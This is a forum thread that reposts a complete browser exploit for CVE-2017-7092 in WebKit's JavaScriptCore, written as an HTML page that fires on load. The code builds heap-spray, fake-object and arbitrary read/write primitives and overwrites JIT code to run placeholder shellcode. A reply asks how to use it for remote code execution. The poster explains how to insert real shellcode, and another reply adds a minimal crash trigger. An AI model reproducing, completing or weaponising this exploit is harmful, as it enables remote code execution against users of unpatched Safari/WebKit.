Nytro Posted September 26, 2017 Report Share Posted September 26, 2017 <html> <head> <script> // b JavaScriptCore`JSC::CopiedSpace::didStartFullCollection() + 218 big_array = []; debug = 0; arr = []; evil_buffer = {}; bigarray_buffer_index = 0; buffer_arr_index = 0; function_to_shellcode = {} function log(txt) { var c = document.createElement("div"); c.innerHTML = "log: " + txt; d.appendChild(c); } function debug_alert(str){ if(debug){ alert(str); log(str); } } function gc() { debug_alert("gc"); for(i = 0;i < 0x924924;i++){ //0x4924924 arr[i] = new ArrayBuffer(20); //54 } debug_alert("gcc"); } function gc2() { try { var c = document.createElement("canvas"); var gl = c.getContext("2d"); for (var i = 0; i < 100; i++) { var gggg = gl.createImageData(1, 0x10000/4) } } catch (e) { } } function make_a_big_hole(){ g = [] gg = "g".repeat(0x7fff1000) debug_alert("big_hole"); for(var i = 0; i < 5;i++){ g[i] = String.prototype.fontsize.call(gg,5); } debug_alert("after_big_hole"); for(var i = 0; i < 0x3;i++){ g[0] = null; //gc //g[1] = null; g[2] = null; //".replace g[3] = null; //hole } //g = null; debug_alert("big_array"); init_big_array_len = 0x10000000; g[2] = new Array(init_big_array_len); g[2].fill(1.1); debug_alert("after_big_array"); big_array = g[2]; //evil_float64 = new Float64Array(new ArrayBuffer(0x7ffffff0)); //arr2 = []; arr2[0] = evil_float64; //heap_feng_shui(); gg = null; gc(); } function make_evil_data(){ nop = "\x00" nop_data = "" offset = 0x38 + 0x1e +0x38 nop_data = nop.repeat(offset/2); //nop_data = nop_data + "\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff" nop_data = nop_data + unescape("%uffff%uffff%uffff%uffff") + "\x00\x00\x00\x00" + unescape("%uffff%uffff%uffff%uffff"); ff = "\x00" ff_data = ff.repeat((0x1000-offset-0x18)/2); return nop_data + ff_data; } function heap_feng_shui(){ debug_alert("heap_feng_shui"); arr2 = [] buffer_arr = [] /* for(var i = 0;i < 20;i++){ //arr2[i] = new Array(0x1000); buffer_arr[i] = new Float64Array(0x2000001); // 
buffer_arr[i].fill(1.1); //float64 1.1 == array 1.0375 }*/ for(var i = 0;i < 0x18000;i++){ evil_float64 = new Float64Array(new ArrayBuffer(0x8000)); evil_float64.fill(1.1); buffer_arr[i] = evil_float64; } debug_alert("after_heap_feng_shui"); } function f64tou32(number){ a = new Float64Array(0x8); a.fill(number); b = new Uint32Array(a.buffer); result = []; result[0] = b[0]; result[1] = b[1]; return result; } function u32tof64(arr){ b = new Uint32Array(0x8); b[1] = arr[1]; b[0] = arr[0]; a = new Float64Array(b.buffer); return a[0]; } function read_obj(obj){ big_array[bigarray_buffer_index] = obj; f64_address = buffer_arr[buffer_arr_index][0x50/8]; uint32 = f64tou32(f64_address); // alert(uint32[1].toString(16)+ " " + uint32[0].toString(16)); return uint32; //alert(uint32[1].toString(16)+ " " + uint32[0].toString(16)); } function fake_obj(arr_address){ f64_address = u32tof64(arr_address); // alert(f64_address); buffer_arr[buffer_arr_index][0x50/8] = f64_address; // alert("here"); return big_array[bigarray_buffer_index]; } function randomString(){ chars = "abcdefghijklmnopq"; maxPos = chars.length; result = ""; for(i = 0;i < 0x8;i++){ result += chars.charAt(Math.floor(Math.random() * maxPos)); } return result; } function sprayFloat64ArrayStru(){ for(var i = 0; i < 0x1000;i++){ var a = new Float64Array(1); a[randomString()] = 1337; } } function Int64(arr){ uint32 = []; uint32[0] = arr[0]; uint32[1] = arr[1] - 0x10000; f = u32tof64(uint32); return f; } function Int64_add(arr,num){ arr[0] = arr[0] + num; return arr; } function read_64(addr){ f = u32tof64(addr); fakearray[0x2] = f; result = []; result[0] = evil_buffer_array[0]; result[1] = evil_buffer_array[1]; //alert(result[1].toString(16)+ " " + result[0].toString(16)); return result; } function write_32(addr,data){ f = u32tof64(addr); fakearray[0x2] = f; evil_buffer_array[0] = data; } function make_jit_function(){ func_body = "eval('');abc = [];" for(i = 0;i<500;i++){ func_body += "abc[" + i.toString() + "];" } 
function_to_shellcode = new Function("a",func_body); // alert("here") for(i = 0;i < 100; i++){ function_to_shellcode(); } // alert("here") } function trigger() { //alert(2); // make_jit_function(); evil_data = make_evil_data(); a = evil_data.repeat(0x7fff0000/0x800); z = a.slice(1); x = "\"".repeat(0x2aaaaaa0); //alert("1"); // alert(evil_data.length.toString(16)); make_a_big_hole(); z = String.prototype.link.call(a,x) alert("The Array length is 0x" + big_array.length.toString(16)); heap_feng_shui(); //z = null; //a = null; //x = null; // heap_feng_shui(); //alert("end"); //Array.prototype.slice.call(arr,1); //Array.prototype.slice.call(buffer_arr,1); t = Array.prototype.slice.call(big_array,0x10000001,0x10000002); t = Array.prototype.slice.call(buffer_arr,1,2); if(big_array.length != init_big_array_len){ // alert("Success!The Array length is 0x" + big_array.length.toString(16)); // alert(big_array[0x1]); /*for(var i = 0x10000000;i < big_array.length;i++){ if(big_array[i] != undefined && big_array[i] != -1){ alert(i.toString(16)); alert(big_array[i]); } }*/ flag = 0; for(var i = 0x35000000;i < 0x4a000000;i=i+0x2000){ //0x4a000000 //alert(i.toString(16)); if(big_array[i] == 1.0375){ alert("find Success"); bigarray_buffer_index = i; big_array[bigarray_buffer_index] = 3.3333333; j = 0; while(j<0x18000){ if(buffer_arr[j][0x50/8] != 1.1){ buffer_arr_index = j; flag = 1; break; } j++; } break; } } if(flag == 0){ alert("can't find buffer!"); window.location.reload(); } } else{ alert("can't overwrite the length!"); window.location.reload(); } //alert(buffer_arr_index); make_jit_function(); sprayFloat64ArrayStru(); evil_buffer_array = new Uint32Array(0x1000); var jsCellHeader = Int64([0x00001000,0x11827000]); var lengthFlags = Int64([0x00000010,0x00010000]); var container = { jsCell : jsCellHeader, butterfly : false, vector : evil_buffer_array, lengthAndFlags : lengthFlags }; address = Int64_add(read_obj(container),0x10); //alert(address[1].toString(16) + " " + 
address[0].toString(16)); fakearray = fake_obj(address); //String.prototype.link.call(container); while(!(fakearray instanceof Float64Array)){ i = 1; jsCellHeader = Int64([0x00001000+i,0x11827000]); container.jsCell = jsCellHeader; i++; } //String.prototype.link.call(fakearray); func_addr = read_obj(function_to_shellcode); // alert(func_addr[1].toString(16)+ " " + func_addr[0].toString(16)); executableAddr = read_64(Int64_add(func_addr,0x18)); jitCodeAddr = read_64(Int64_add(executableAddr,0x18)); codeAddr = read_64(Int64_add(jitCodeAddr,0x20)); write_32(codeAddr,0xcccccccc); //codeAddr = read_64(Int64_add(jitCodeAddr,0x10)); //write_32(codeAddr,0xcccccccc); alert("begin_shellcode!!!!!!"); function_to_shellcode(); alert("end"); } </script> </head> <body onload="trigger()"> <pre id="d"> </pre> </body> </html> Sursa: https://github.com/xuechiyaobai/CVE-2017-7092-Exploit 1 Quote Link to comment Share on other sites More sharing options...
darkhunter98 Posted June 19, 2018
How can i use this for rce?
QuoVadis Posted June 19, 2018
39 minutes ago, darkhunter98 said: How can i use this for rce? Sunt detalii pe https://gloryholefoundation.com
Nytro Posted January 16, 2019
Probably you need to update it (replace 0xcccccccc with your shellcode - first 4 bytes, and continue). Not sure. write_32(codeAddr,0xcccccccc);
ARUBA Posted January 17, 2019
var s = 'x'.repeat(0x7fffffff); http://s.link (s); https://github.com/WebKit/webkit/blob/bce57f1454bb396d3e8133da38a906d31bdf8ad1/Source/JavaScriptCore/runtime/StringPrototype.cpp#L1808